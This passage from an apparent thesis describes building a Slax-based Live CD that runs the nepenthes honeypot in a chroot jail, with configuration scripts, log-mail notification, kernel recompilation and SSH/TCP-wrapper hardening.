code package. The script probes the operating system the package will be installed
on for numerous platform-specific features. For instance, it checks the availability of
certain dependency libraries. By doing so, it is verified that all system requirements are
correctly fulfilled.
The default nepenthes source package is already distributed with such a configuration
script and comprises the standard modules. Because our Live CD implements a custom-built version of the honeypot, we must update this script though. Therefore, we edit
the original template file, add the directory path of our own modules, and execute the
autoreconf command to take the new definitions into account. We must also run
GNU automake[15] which, in co-operation with autoconf, generates a so-called global
Makefile. This file is processed by the make command to compile the source code of the
honeypot. By specifying the DESTDIR parameter and the install argument, we can
finally install the application to a pre-set location. A summary of these operations is
shown in Figure 4.7.
[14] see http://www.gnu.org/software/autoconf/
[15] see http://www.gnu.org/software/automake/
Figure 4.7: Illustration of the GNU Configure and Build System
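The build sequence can be summarized as a short shell function. This is a sketch under stated assumptions rather than the exact commands used for the Live CD: the source and staging paths are hypothetical, the run helper and DRY_RUN variable are additions for previewing the commands, and autoreconf is called with --install so that it also invokes automake where needed.

```shell
#!/bin/sh
# run: print the command when DRY_RUN is set, execute it otherwise.
# (Hypothetical helper.)
run() {
    if [ -n "${DRY_RUN:-}" ]; then
        echo "$*"
    else
        "$@"
    fi
}

# build_nepenthes SRC STAGE
#   SRC   - hypothetical path to the unpacked nepenthes sources
#   STAGE - staging directory that receives the installed files
build_nepenthes() {
    src=$1
    stage=$2
    run cd "$src" || return 1
    run autoreconf --install            # regenerate configure and Makefile.in
    run ./configure                     # probe the system for dependencies
    run make                            # compile the honeypot
    run make install DESTDIR="$stage"   # install below the staging directory
}
```

Because DESTDIR is prepended to every installation path, the complete package tree ends up below the staging directory and can later be copied without touching the host system.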
Preparing the secured environment: As we have outlined in Section 4.3.2, the honeypot
is to be executed within an isolated, minimized environment, i.e., only a rudimentary set
of functions and operations is being made available. For this reason, we need to supply
nepenthes with all its dependencies, namely the libadns[16], libcap[17], libcurl[18], libmagic[19],
libpcap[20], libpcre[21], and libprelude[22] libraries. A brief description of these libraries is shown
in Table 4.8. Their source code is prepared and compiled with the configure and make
commands, analogously to the building process of the base honeypot. In the last step,
we separate the program files from other parts of the operating system by invoking
make install with the DESTDIR parameter as described above.
[16] see http://www.chiark.greenend.org.uk/~ian/adns/
[17] see ftp://ftp.kernel.org/pub/linux/libs/security/linux-privs/kernel-2.6/
[18] see http://curl.haxx.se/
[19] see http://packages.debian.org/unstable/libdevel/libmagic-dev
[20] see http://www.tcpdump.org/
[21] see http://www.pcre.org/
[22] see http://www.prelude-ids.com/en/development/download/
Dependency Library   Description
Libadns              Libadns is an easy-to-use, asynchronous-capable DNS resolver that translates domain names into IP addresses.
Libcap               This library enables nepenthes to use the POSIX 1e capability support that is built into the Linux kernel (see Trümper, 1999). With so-called Access Control Lists (ACLs), it is possible to have fine-grained control over the privileges of a file.
Libcurl              These libraries are used for downloading malicious files over HTTP and FTP.
Libmagic             Libmagic determines the type of a file based on a magic number or a string that is found in the file.
Libpcap              The Libpcap library offers a high level interface for capturing network packets.
Libpcre              The Libpcre library is a set of functions for pattern matching with Perl-compatible regular expressions.
Libprelude           Libprelude is a supportive library for the hybrid intrusion detection framework Prelude that enables different security applications to report to a central system. In order to use this function, nepenthes must be configured and compiled with the option --enable-prelude.
Table 4.8: Dependency Libraries Required for the nepenthes Low-Interaction Honeypot
Building the secured environment: When all operations are finished, we copy the
generated package trees to a single directory. This directory serves as a foundation for
the secured zone which can later be set up easily with the chroot command. By invoking
chroot, a pseudo root directory is created (see Flenov, 2005). As a consequence, files
that are stored in upper layers of the directory hierarchy cannot be accessed any longer,
because the created environment appears to be the top node of a virtual file system
(cmp. also Friedl, 2002; Burr, 2002). Thereby, applications that are executed with non-superuser privileges within the chrooted directory are held captive in a tightly bound
jail.
To permit proper operations, the jail encloses the bash (Bourne-Again Shell) command
interpreter as well as binaries to list the contents of files and directories, e.g., the cd and
ls commands. These utilities, in turn, make use of additional software components, for
example the general libc library which defines basic system calls and functions for the C
programming language the executables are written in. The dependencies must be copied
to the appropriate branches in the directory hierarchy. The ldd command is of great
help to find the correct path of the auxiliary files. In the last step, we run ldconfig, an
administrative tool for rebuilding the cache of the runtime linker. Thereby, all shared
libraries can be found when a program is launched.
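Collecting the dependencies with ldd can be automated. The sketch below is illustrative only: ldd_paths and copy_deps are hypothetical helper names, and the parsing assumes the usual ldd output format in which a resolved library appears either as "name => /path (address)" or as "/path (address)".

```shell
#!/bin/sh
# ldd_paths: read ldd output on stdin and print the absolute paths of
# the shared libraries it names, one per line.
ldd_paths() {
    awk '
        # Form: libc.so.6 => /lib/libc.so.6 (0x...)
        $2 == "=>" && $3 ~ /^\// { print $3; next }
        # Form: /lib/ld-linux.so.2 (0x...)
        $1 ~ /^\// { print $1 }
    '
}

# copy_deps BINARY JAIL: copy the libraries BINARY depends on to the
# same relative location below JAIL (hypothetical helper).
copy_deps() {
    ldd "$1" | ldd_paths | while read -r lib; do
        mkdir -p "$2$(dirname "$lib")"
        cp -p "$lib" "$2$lib"
    done
}
```

A call such as copy_deps /bin/bash /path/to/jail would then place each library in the matching branch of the jail, after which ldconfig can rebuild the linker cache.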
In order to successfully invoke the honeypot within our secured zone, we must make a
number of further changes: First, we have to add the /tmp directory with global access
permissions to permit temporary operations. Additionally, the /var/log directory must
be created in order to enable logging activities. Second, we generate the world-readable
passwd and group files in the etc directory of our jail. These files store authentication-related information about legitimate users and groups of the system and are required
by nepenthes. A typical line in the passwd file is printed below. The entry defines the
superuser account with a user and group identification number of 0, the home directory,
and the command shell to be used. The x in the second column refers to a so-called
shadow file which usually contains the encrypted system passwords. However, as we do
not perform any login operations within the isolated environment, the shadow file is
omitted for security reasons.
root:x:0:0::/root:/bin/bash
Third and last, we set up a device special file /dev/null with the mknod command.
The file accepts arbitrary input flows but does not produce any corresponding output
streams (cmp. Dalheimer and Welsh, 2005). As we will see later, this characteristic is
extremely beneficial to discard unwanted error and notifying messages from our scripts.
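The three preparation steps can be collected in a small script. This is a minimal sketch, not the script used on the Live CD: the function names and the jail path are hypothetical, the sticky bit on tmp and the single root entry in the group file are our assumptions, and the device node is created in a separate function because mknod requires superuser privileges.

```shell
#!/bin/sh
# make_jail_skeleton JAIL: create the directories and account files
# described in the text. JAIL is a hypothetical path to the jail root.
make_jail_skeleton() {
    jail=$1
    mkdir -p "$jail/tmp" "$jail/var/log" "$jail/etc" "$jail/dev" || return 1
    chmod 1777 "$jail/tmp"      # global access; sticky bit is an assumption

    # Minimal, world-readable account databases; no shadow file is created.
    echo 'root:x:0:0::/root:/bin/bash' > "$jail/etc/passwd"
    echo 'root:x:0:' > "$jail/etc/group"
    chmod 644 "$jail/etc/passwd" "$jail/etc/group"
}

# make_dev_null JAIL: create the device special file (run as root).
# Major number 1 and minor number 3 identify /dev/null on Linux.
make_dev_null() {
    mknod -m 666 "$1/dev/null" c 1 3
}
```

Redirecting output to the resulting dev/null inside the jail then discards it in the same way as on the host system.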
Once all modifications are completed, the jail has a structure as shown in Figure 4.8.
It is similar to the original directory tree of the operating system even though the number
of applications provided is significantly smaller. To start nepenthes within the secured
environment, we execute the chroot command as follows:
chroot . bin/bash -c "[path to nepenthes] -u <user> -g <group>"
The decoy is then initialized with full access permissions by the bash command interpreter. This operation is necessary to permit emulating services that bind to the
well-known ports (cmp. Internet Assigned Numbers Authority (IANA), 2008), i.e., ports
with registered numbers less than 1024. An example of an emulated service that binds to
a well known port is defined in the Apache module of nepenthes. The module simulates
an HTTP server and listens on port 80.
Services running on the registered and private ports (i.e., 1024 and higher) may be
executed with a non-privileged user account for security reasons. The username and
corresponding group can be specified with the -u and -g options.
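The distinction between well-known and other ports can be expressed as a simple check. The helper names and the example account below are hypothetical and only illustrate the rule; they are not part of nepenthes.

```shell
#!/bin/sh
# needs_root PORT: succeed if binding to PORT requires superuser
# privileges, i.e., if PORT is a well-known port (0 to 1023).
needs_root() {
    [ "$1" -ge 0 ] && [ "$1" -lt 1024 ]
}

# account_for_port PORT USER: print the account under which a service
# listening on PORT has to be started. USER is a hypothetical
# non-privileged account.
account_for_port() {
    if needs_root "$1"; then
        echo root
    else
        echo "$2"
    fi
}
```

For the emulated HTTP server on port 80, account_for_port 80 nepenthes prints root, whereas a service on port 8080 could run under the non-privileged account.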
Developing the maintenance and configuration scripts: To facilitate the configuration
of the honeypot, we develop a graphical interface that allows enabling or disabling individual modules as well as editing specific program settings. All modifications take
effect when nepenthes is restarted.
Figure 4.8: Directory Structure of the Secured Live CD Environment
The graphical interface is based on the dialog package[23] which is maintained by Vincent Stemen. The dialog application is called from within a shell script. By specifying
different command line parameters, we are able to display various interactive elements
such as message boxes, checklists, or text fields. Input and output operations are redirected to the system console. That is why it is possible to perform administrative tasks
locally as well as over a non-graphical, remote network connection.
When our shell script is launched, a menu with different selection options is shown.
The user may then, for instance, choose to view the list of activated vulnerability modules (see Figure 4.9(a)). This list and other program variables are stored in the main
nepenthes configuration file. A module-related entry in the configuration file is divided
into three sections and consists of the module name, the name of a module-specific dependency file, and another parameter which is usually left empty. For example, the
configuration directive for the Sub7 trojan backdoor[24] refers to the vulnsub7.so module and a dependent vuln-sub7.conf file.
[23] see http://hightek.org/dialog/
[24] see http://www.sub7legends.com/
Since other modules are described in a similar fashion, we are able to define a regular
expression which helps find standardized text patterns quickly (see Friedl, 2006, for a
complete overview of regular expressions). Regular expressions are supported by
many programming languages, e.g., awk[25] which is already included on the Slax Live
CD and may thus be easily integrated into our distribution.
With the help of a simple awk program, we extract the relevant text fractions from
the main configuration file and temporarily save the results in memory. Other potential
inter-process messages that are returned by the command shell are discarded through
redirection to the device special file /dev/null as we have explained above. Thus, the
execution of the awk script is completely transparent to the user.
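An extraction step of this kind might look as follows. The sketch is not the script from Appendix A: list_modules is a hypothetical name, and we assume that each module entry consists of three double-quoted, comma-separated strings on one line and that a disabled entry is preceded by two slashes.

```shell
#!/bin/sh
# list_modules FILE: print every module entry of the configuration
# file as "<module> on" or "<module> off".
# Assumed entry format:   "vulnsub7.so", "vuln-sub7.conf", ""
# Assumed disabled form:  // "vulnsub7.so", "vuln-sub7.conf", ""
list_modules() {
    awk '
        /^[ \t]*(\/\/)?[ \t]*"[^"]+\.so"/ {
            status = ($0 ~ /^[ \t]*\/\//) ? "off" : "on"
            # The module name is the first quoted string on the line.
            split($0, part, "\"")
            print part[2], status
        }
    ' "$1" 2>/dev/null
}
```

The on and off markers correspond to the status values that a dialog checklist expects for each item, so the output can be passed on with little further processing.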
When the operation is finished, the temporarily stored data is read in, and the status
of the different modules is displayed within a new dialog window. The user may then
interactively enable or disable specific components of the honeypot. After all changes
have been made, the list of selected modules is returned. The program settings are then
updated with sed[26], a second helper utility which is capable of editing specific sections
of a file (see Dougherty and Robbins, 1997).
To deactivate a certain module, we write a basic sed instruction and simply insert
two leading slashes (//) before the respective entry in the configuration file. As a
consequence, the string is interpreted as a user comment and gets ignored when the file
is parsed at the start of nepenthes. To reactivate a module, the comment characters are
removed, and the original entry is restored. An extract of the corresponding shell script
which illustrates the interaction with awk and sed is printed in Appendix A.
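Independently of the script in Appendix A, the two sed operations can be sketched as follows. The function names are hypothetical, and the entry format (a double-quoted module name at the start of the line) is an assumption. A temporary file is used instead of in-place editing because the corresponding sed option differs between implementations.

```shell
#!/bin/sh
# disable_module FILE MODULE: comment out the entry of MODULE by
# inserting two leading slashes before it.
disable_module() {
    mod=$(printf '%s' "$2" | sed 's|\.|\\.|g')   # escape dots for the regex
    sed "s|^\([[:space:]]*\)\(\"$mod\"\)|\1//\2|" "$1" > "$1.tmp" &&
        mv "$1.tmp" "$1"
}

# enable_module FILE MODULE: remove the comment characters again and
# restore the original entry.
enable_module() {
    mod=$(printf '%s' "$2" | sed 's|\.|\\.|g')
    sed "s|^\([[:space:]]*\)//[[:space:]]*\(\"$mod\"\)|\1\2|" "$1" > "$1.tmp" &&
        mv "$1.tmp" "$1"
}
```

Calling disable_module twice has no further effect, because an entry that is already commented out no longer matches the pattern.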
Our graphical interface also permits modifying module-related program parameters of
the honeypot. For this purpose, we list the individual configuration files in a separate
file selection dialog (see Figure 4.9(b)). When a choice is made, the specific file is
linked with an external editor, and the user has the possibility of manually updating the
program options. For example, in order to change the Internet address of the central
server malicious binaries will be sent to, the file submit-norman.conf is automatically
opened.
Building the entire honeypot module: The configuration script, the core honeypot
package, and its dependencies are finally compressed with the dir2lzm command to
create a new Live CD module as we have outlined in the previous section. The generated
module is then copied to the base directory of the distribution so it is loaded at system
startup. Afterwards, nepenthes can be launched over the default desktop manager and
commence collecting data about threats and intrusions. For this purpose, we need to
adapt the graphical user interface of the operating system. This process is explained
in Section 4.3.3.7. Users are also to be automatically informed about honeypot-related
events on a regular basis. For this reason, we also implement a notification system on
the Live CD. The architecture of this system is subject of the next section.
[25] see http://www.gnu.org/software/gawk/gawk.html and cmp. Dougherty and Robbins (1997)
[26] see http://www.gnu.org/software/sed/
(a) Module Selection Dialog for Activating/Deactivating the Vulnerability Modules
(b) File Selection Dialog for Editing a Configuration File
Figure 4.9: Honeypot Configuration Interface of the Live CD
4.3.3.3 Implementing the Notification System
Once the nepenthes honeypot is started, it generates a significant amount of information
about threats and malicious activities with the help of several logging modules (cmp.
previous section). For instance, whenever a compromise is detected and a piece of
malicious software is successfully captured, this event is written to a special file which is
stored in the var/log folder of the application directory. However, when data is collected
simultaneously on multiple machines, analyzing each device can be time consuming.
For this reason, we set up an automated notification system in order to decrease the
maintenance effort for system administrators and security professionals. Aggregated
status reports for the individual decoys can then be received on a daily basis.
The architecture of the notification system is based upon three components, namely
the logrotate utility, the mailx program, and the Postfix server. These components are
briefly described in the following.
The logrotate utility[27] by Erik Troan and Preston Brown is already included in the
original Slax distribution and permits “rotation, compression, removal, and mailing of
log files” (see Troan and Brown, 2002). Due to these features, we are able to automatically process messages that are generated by nepenthes within a given time interval. For this purpose, we define various directives in the main configuration file
/etc/logrotate.conf. For example, to add a timestamp to each of the relevant log
files, we specify the dateext directive (see also Ducea, 2006; Sharma, 2005). Additionally, we implement definitions to create a daily archive of all files. The archive is
compressed in order to save space on the Live CD.
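A logrotate stanza with these properties can be generated by a short shell function. The sketch is an assumption about what such a definition could look like, not the configuration shipped on the Live CD: the function name, the log directory, and the number of retained archives (rotate 7) are hypothetical, while daily, dateext, compress, missingok, and notifempty are standard logrotate directives.

```shell
#!/bin/sh
# write_logrotate_conf LOGDIR OUTFILE
#   LOGDIR  - directory holding the nepenthes log files (hypothetical)
#   OUTFILE - file that receives the logrotate stanza
write_logrotate_conf() {
    cat > "$2" <<EOF
$1/*.log {
    daily
    rotate 7
    dateext
    compress
    missingok
    notifempty
}
EOF
}
```

The generated stanza could be appended to /etc/logrotate.conf or stored in a separate file that is included from there.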
[27] see https://fedorahosted.org/logrotate/wiki
Figure 4.10: Architecture of the Notification System on the Live CD
In the next step, the compressed archive is passed to the mailx program. As the
name suggests, mailx[28] is a simple tool for sending and receiving mail. It is maintained
by Gunnar Ritter. One of its major advantages is its capability to be either executed
interactively or entirely through a script by specifying a number of command line arguments. Therefore, we are able to compose an automated message and inform users
about honeypot-related incidents, while sending the archive with the nepenthes log files
as an attachment.
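A non-interactive call of mailx might be sketched as follows. We assume the mailx variant referenced above (formerly nail), in which -s sets the subject and -a attaches a file; other mailx implementations interpret -a differently. The function name, subject line, archive path, and recipient are hypothetical, and the run helper only serves to preview the command.

```shell
#!/bin/sh
# run: print the command when DRY_RUN is set, execute it otherwise.
# (Hypothetical helper.)
run() {
    if [ -n "${DRY_RUN:-}" ]; then
        echo "$*"
    else
        "$@"
    fi
}

# send_report ARCHIVE RECIPIENT: mail the compressed log archive.
# Assumption: -s sets the subject and -a attaches a file.
send_report() {
    archive=$1
    recipient=$2
    # The message body is read from standard input.
    echo "The current nepenthes log archive is attached." |
        run mailx -s "nepenthes daily report" -a "$archive" "$recipient"
}
```

Since no interactive input is required, such a call can be issued from a script that runs after the log files have been rotated.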
The actual delivery of the message is performed by a Postfix server[29] which is implemented as an independent mail transfer agent (MTA) on the CD. In comparison to
other MTAs such as Sendmail[30], Postfix is particularly reliable, robust, and secure while
being easy to use (cmp. Dent, 2002). These characteristics make Postfix well-suited for
a security-sensitive environment. A summary of the cooperation between the different
components is illustrated in Figure 4.10.
In the following sections, we explain the remastering and customization activities for
other major components of the Live CD, including the boot loader and the system kernel.
The chronological order of the description is in accordance with the boot sequence of
the distribution that we have described in Section 4.3.1.1 (see also Figure 4.3).
4.3.3.4 Adapting the Boot Loader
As we have already explained, the central task of a boot loader is to invoke the kernel of
the operating system after the machine has been started. The Slax Live CD implements
the Isolinux[31] boot loader by H. Peter Anvin. It is open source, free of charge, and
fully compatible with the El Torito format specification which is required to launch the
distribution from CD. For our purposes, Isolinux only needs to be slightly adapted.
[28] see http://sourceforge.net/projects/nail/
[29] see http://www.postfix.org/
[30] see http://www.sendmail.org/
[31] see http://syslinux.zytor.com/iso.php
1  LABEL xconf
2  MENU LABEL Nepox Graphics mode (KDE)
3  KERNEL /boot/vmlinuz
4  APPEND vga=769 initrd=/boot/initrd.gz ramdisk_size=6666 root=/dev/ram0
5         rw passwd=ask autoexec=xconf;kdm
Listing 4.2: Sample Boot Label of the Isolinux Boot Loader
First, the package of the boot loader is saved to a directory in the boot folder of the
Live CD. It contains an isolinux.cfg configuration file which is processed at system
startup. The configuration file includes a number of boot labels the user may select
from. A boot label typically comprises the path to the kernel as well as additional boot
options that are passed to the core services for further initializing operations. Due to
those options, multiple system profiles may be created. For instance, it is possible to
specify different video modes in order to support machines with limited screen resolution
capabilities.
A sample label is shown in Listing 4.2. As can be seen in Line 4, the different boot
options are defined in a separate APPEND section. One of the most important options is
initrd. It determines the location and size of the initial ram disk which is responsible
for storing several key applications as we have briefly described in Section 4.3.1.1.
With the help of the passwd parameter, the user may be prompted to change the default
password when the operating system is loaded. We include this parameter for security
purposes, because users are free to log in remotely over the Internet for maintenance
reasons. A description of the remaining boot options as well as all other valid boot
declarations can be found in Appendix B.
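To illustrate the structure of an APPEND line, the following sketch extracts the value of a single boot option. The function name is hypothetical, and the code merely assumes that options are separated by whitespace and written as name=value, as in Listing 4.2.

```shell
#!/bin/sh
# boot_option LINE NAME: print the value of the boot option NAME from
# an APPEND line. Returns non-zero if NAME is absent or carries no
# value (such as the plain rw flag).
boot_option() {
    for word in $1; do
        case $word in
            "$2"=*)
                echo "${word#*=}"
                return 0
                ;;
        esac
    done
    return 1
}
```

Applied to the label in Listing 4.2, boot_option "$line" initrd prints /boot/initrd.gz and boot_option "$line" passwd prints ask.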
4.3.3.5 Compiling the System Kernel
The name and boot picture of the original Slax distribution are deeply rooted in the core
of the operating system. To replace the existing information and display our own logo
at startup, we need to recompile the system kernel. This operation, however, cannot be
directly performed from within the Live CD, because only a reduced set of the necessary
source files is provided in order to save disk space. For this reason, recompilation must
be invoked on a full-featured operating system. We recommend installing Slackware, as
it is the parent distribution of Slax (cmp. Section 4.1). We must then obtain the kernel
files and the archives of the SquashFS and aufs file systems. As we have described in
Section 4.3.1.2, SquashFS and aufs are used to store data in a compressed format as well
as permit write operations during runtime. They are required to build a proper Live
CD and must therefore be integrated into the kernel.
# create a valid logo file
pngtopam logo.png | pnmquant 223 | pnmtopnm -plain > logo_linux_clut224.ppm
# copy the logo to the directory of the kernel sources
cp logo_linux_clut224.ppm /usr/src/linux-`uname -r`/drivers/video/logo/
Listing 4.3: Creating a Kernel Logo for the Live CD
The author of Slax maintains a web server where all required packages may be downloaded[32].
These packages must be extracted to the /usr/src/ directory where the core
sources of the operating system are stored. To build a new, adapted version of the
kernel for our Live CD, the following steps have to be carried out (cmp. Kroah-Hartman,
2006): First, a valid kernel configuration file must be created, either from scratch, from a
default configuration file, or taken from a distribution release. The configuration file contains instructions on whether specific drivers or other architectural objects are excluded
entirely from the compilation process, directly compiled in the core, or provided as loadable kernel modules (LKMs). A loadable kernel module can be dynamically attached
or detached during runtime without needing to reboot the system. This characteristic
is a major advantage, because it offers a great deal of flexibility and makes it possible to quickly
modify the current hardware profile. Furthermore, a module is completely unloaded
from memory and does not occupy space any longer when asked to detach, in contrast
to elements of the base kernel that must always reside in memory even when idle. That
is why it is generally proposed to build kernel components modularly where feasible and
keep the size of the core system as small as possible (see Henderson, 2006).
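The three possible compilation decisions can be read directly from a kernel configuration file, in which an option is marked with =y when it is compiled into the core, with =m when it is built as a loadable kernel module, and with the comment "is not set" when it is excluded. The helper below is a hypothetical sketch for inspecting such a file; the option names in the usage note are merely examples.

```shell
#!/bin/sh
# config_state FILE OPTION: print how OPTION is handled in a kernel
# configuration file: "built-in", "module", or "excluded".
config_state() {
    if grep -q "^$2=y\$" "$1"; then
        echo built-in
    elif grep -q "^$2=m\$" "$1"; then
        echo module
    else
        echo excluded
    fi
}

# count_modules FILE: print the number of options built as LKMs.
count_modules() {
    grep -c '=m$' "$1"
}
```

For instance, config_state .config CONFIG_EXT3_FS reports whether support for the ext3 file system is compiled into the core or provided as a module.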
A complete list with the individual compilation decisions is also available on the web
server of the Slax distributor. This list forms a good basis for our own kernel definitions.
To create the final configuration file, the list must be renamed to .config and copied
to the directory of the core sources. Afterwards, we simply run the make oldconfig and
make prepare commands to initialize the recompilation process.
In the second step, we integrate our own custom boot logo into the kernel. It is
composed of a picture of the nepenthes carnivorous plant as well as the name that we
have chosen for our Live CD, Nepox, an acronym for nepenthes out of the box.
The input source for the logo can be any graphical format, but it must be converted
to a so-called portable pixel map (PPM) with less than 224 colors (cmp. logo linux.h as
defined by the Linux Kernel Organization, 2008). Conversion can be easily done with
netpbm[33], an image manipulation toolkit by Bryan Henderson which is open source and
free of charge. In Listing 4.3, sample commands for creating a logo from a PNG (Portable
Network Graphics) file are shown.
[32] see ftp://ftp.slax.org/source/slax/kernel/
[33] see http://netpbm.sourceforge.net/
After specifying the boot picture for our Live CD, we are able to compile the loadable kernel modules and the core components with the make command as illustrated in
Listing 4.4. The file system modules for SquashFS and aufs are not part of the kernel
configuration and must therefore be built separately (see also Lougher and Okajima,
2008).
# create a temporary directory for the new kernel
KERNEL=/tmp/`uname -r`
mkdir -p $KERNEL
# change to the directory of the kernel sources
cd /usr/src/linux-`uname -r`/
# compile and install the loadable kernel modules in the directory
# of the system kernel
make -j 4 modules
INSTALL_MOD_PATH=$KERNEL make modules_install
# create a compressed kernel image
make -j 4 bzImage
# save the kernel configuration and the kernel image to the
# directory of the new kernel
mkdir -p $KERNEL/boot
cp .config $KERNEL/boot
cp arch/i386/boot/bzImage $KERNEL/boot/vmlinuz
Listing 4.4: Compiling the Kernel for the Live CD
In the next step, we need to transfer all created files to our distribution. However, even
though all dependencies are now included in the Live CD, the system is not functional
yet. We still have to update the initial ram disk which is run at system startup and
integrates support for the basic file systems as well as the core drivers. Performing this
operation manually is error-prone because many files must be copied individually (cmp.
Jones, 2006b). For this reason, the author of Slax has published a free collection of
scripts, the so-called Linux Live scripts, to facilitate this process (see Matejicek, 2008b).
The script generates a valid ram disk which must be saved to the boot directory of the
CD. Afterwards, we only have to mount the disk temporarily and edit the linuxrc start
file to adapt the system messages to our needs. Mounting requires use of a so-called
loopback interface. With the help of this interface, the ram disk image, which is a
regular file, can be accessed like a block device that contains a file system. When all
changes are made, the disk can be unmounted and compressed again as described in Listing 4.5.
Finally, we run the make_iso.sh command to build an image of the distribution with
the new kernel and system components. A summary of the entire recompilation process
is given in Figure 4.11. The development of the Live CD core is now completed. In the
remaining sections, we illustrate customization operations to enhance the security and
user friendliness of the CD.
# create a temporary directory for the initial ram disk
mkdir ramdisk
# copy and uncompress the initial ram disk
cp /boot/initrd.gz . && gunzip initrd.gz
# mount the initial ram disk to the loopback interface
mount -t ext2 -o loop initrd ramdisk/
# adapt the linuxrc start file
...
# update and compress the initial ram disk
umount ramdisk/ && gzip -9 initrd
Listing 4.5: Mounting the Initial Ram to Adapt the linuxrc Start File
Figure 4.11: Overview about the Recompilation Process of the Kernel
4.3.3.6 Hardening the System Environment
One of the major challenges of the Live CD is to ensure the safety and integrity of the
underlying operating system. This means, while it must be possible to compromise the
emulated services of the honeypot, all other resources must be protected against attacks
at all times.
Preventing illegitimate access, data modification, or deletion requires a process which
is known as system hardening. It involves measures on the network as well as on the
physical layer (cmp. Turnbull, 2005). In this section, however, we only cover network-related aspects. For more information on securing the physical level, please refer to the
draft by the National Institute of Standards and Technology (1996).
Our system protection scheme is twofold: First, we shut down all programs that are not
vitally important at startup in order to minimize the number of potential entry points
and vulnerabilities. As our Live CD is supposed to work as a single, independent data
collection device, this includes network sharing and network connection applications.
Second, we propose improving the authentication procedure for the SSH remote administration server and use so-called wrappers to limit access solely to certain IP addresses
and ranges.
Reducing the number of started services: Generally, services on the Live CD are started
by initialization scripts that are stored in the /etc/rc.d/ directory. As we have briefly
explained in Section 4.3.1.1, these scripts are invoked by an init master process when
the computer boots up and depend on a specific run level (see also Brockmeier, 2001).
A run level determines the state the system is in, the provided functionality, and the
mode of operation. At any given time, the state of the machine reflects one of the levels
listed in Table 4.9.
To disable a service, it is sufficient to revoke the execution permissions from its initialization script. Thereby, the application is not loaded when the operating system is
launched and is not bound to a network port. For example, to prevent the Common
Unix Printing System (CUPS) from being executed at boot time, we change the
Run Level  Description
0          System halt
1          Single user mode
2          Not defined
3          Multiuser mode with networking enabled and console login
4          Multiuser mode with networking enabled and graphical desktop manager
5          Not defined
6          System reboot
Table 4.9: Overview about the Run Levels of the Operating System
(Source: Based on Brockmeier, 2001)
access rights of the initialization script with the chmod command and the parameter -x
as follows:
chmod -x /etc/rc.d/rc.cups
Further candidates for removal may be identified with netstat, a utility for displaying
all running network applications. It is already part of the original Slax distribution.
Repeating the chmod command for the initialization scripts of the services in question,
we sequentially exclude all unneeded programs except the Postfix and SSH server from
the boot sequence. Thus, we effectively reduce the attack surface of our Live CD to two
system components.
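Repeating the chmod call for several services can be sketched as a small loop. The function name disable_services and its arguments are hypothetical; the sketch assumes that every service script follows the rc.<name> naming pattern shown above. It deliberately takes an explicit list of services to disable, because the same directory also holds scripts that are required for booting.

```shell
#!/bin/sh
# Hypothetical helper: revoke the execute permission from the initialization
# scripts of the named services so that they are skipped at boot time.
disable_services() {
    rc_dir=$1; shift                 # directory with the rc.* scripts, e.g. /etc/rc.d
    for name in "$@"; do             # service names without the rc. prefix
        script=$rc_dir/rc.$name
        if [ -f "$script" ]; then
            chmod -x "$script" && echo "disabled: $name"
        else
            echo "no such script: $script" >&2
        fi
    done
}
```

A call such as disable_services /etc/rc.d cups would reproduce the command shown above. Candidates for the list can be found beforehand with netstat -tulpn, which prints the listening TCP and UDP sockets together with the owning programs.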
Improving the authentication mechanism for the SSH server: Even though the SSH
server strongly facilitates remote maintenance of the distribution, the password-based
login mechanism of the service still forms a possible weak spot. For instance, by generating a large dictionary of common words, names, and phrases, an attacker may be able
to successfully guess the authentication credentials, log in, and compromise the system.
For this reason, we suggest not relying solely on the strength of the chosen password but
also verifying the identity of the user with an additional security token. The security token
can be implemented as a pair of private and public keys. The public key can
be freely distributed and is stored in a special directory on the CD. The corresponding
private key is protected with a password and strictly remains with the user. To log in, the
correct password must be entered, and the location of the private key must be specified.
Thus, the authentication process is based on two factors, and access is granted if, and
only if, both factors are fulfilled. In turn, if an intruder does not possess the private
key or does not know the matching password, authentication fails, and access is rejected.
An illustration of this process is shown in Figure 4.12; a more thorough explanation is
given by Schneier (1996).
To generate a valid key pair, we simply run the ssh-keygen command. The created
public key must then be copied to the authorized_keys file in the .ssh/ directory of
the system user. The private key must be transferred to a trusted machine and has to be
kept secret. In the last step, we update the configuration file /etc/ssh/sshd_config
of the SSH service to accept public key identification requests and reject password-only
logins (cmp. Mates, 2008). After restarting the server, the two-factor authentication
functionality is enabled.
Figure 4.12: Two-Factor Authentication Process of the SSH Remote Administration Service
Using TCP wrappers for access control: In order to impede illegitimate access to our
CD, we can also make use of the TCP wrapper support the SSH remote maintenance
application is compiled with. A TCP wrapper is a host-based network filter for system
services (see Venema, 1992). Depending on a simple access control list (ACL), communication requests to a service are either accepted or denied. The access control
list is defined by two files, hosts.allow and hosts.deny, that are stored in the main
configuration directory of the distribution. For security purposes, we recommend creating access rules according to a whitelist, i.e., we only permit connections from specific
machines while rejecting traffic from all others. A sample configuration for hosts within
the subnet 192.168.1.0/24 is illustrated in Listing 4.6. As can be seen, wrappers, in
cooperation with two-factor authentication, may thus add another layer of protection
against attacks.
/etc/hosts.allow:
# accept connections from the subnet 192.168.1.0/24
sshd: 192.168.1.0/255.255.255.0
/etc/hosts.deny:
# reject requests from all other machines
sshd: ALL
Listing 4.6: Example of a TCP Wrapper Configuration
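A net/mask pattern such as the one in Listing 4.6 matches a client if the network address equals the bitwise AND of the client address and the mask. The following sketch reproduces this comparison for IPv4 addresses in order to check which hosts a rule would cover. The function names ip_to_int and in_subnet are hypothetical, and the code only illustrates the matching rule; it is not how the wrapper library is implemented.

```shell
#!/bin/sh
# Convert a dotted-quad IPv4 address (without leading zeros) to an integer.
ip_to_int() {
    old_ifs=$IFS
    IFS=.
    set -- $1            # split the address into its four octets
    IFS=$old_ifs
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# Succeed if ADDRESS is matched by the pattern NETWORK/NETMASK.
# usage: in_subnet ADDRESS NETWORK NETMASK
in_subnet() {
    addr=$(ip_to_int "$1")
    net=$(ip_to_int "$2")
    mask=$(ip_to_int "$3")
    [ $(( addr & mask )) -eq "$net" ]
}
```

For instance, in_subnet 192.168.1.42 192.168.1.0 255.255.255.0 succeeds, whereas the same call for 192.168.2.42 fails, so the latter host would fall through to the rule in hosts.deny.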
4.3.3.7 Customizing the Graphical User Interface
We have already pointed out that the usability and user friendliness of our Live CD are
important criteria for system administrators and security professionals in order to carry
out maintenance tasks quickly and focus on data collection and data analysis activities.
For this reason, all honeypot and system functions are to be configured and executed
within a graphical user interface.
The original Slax distribution implements the K Desktop Environment (KDE) which
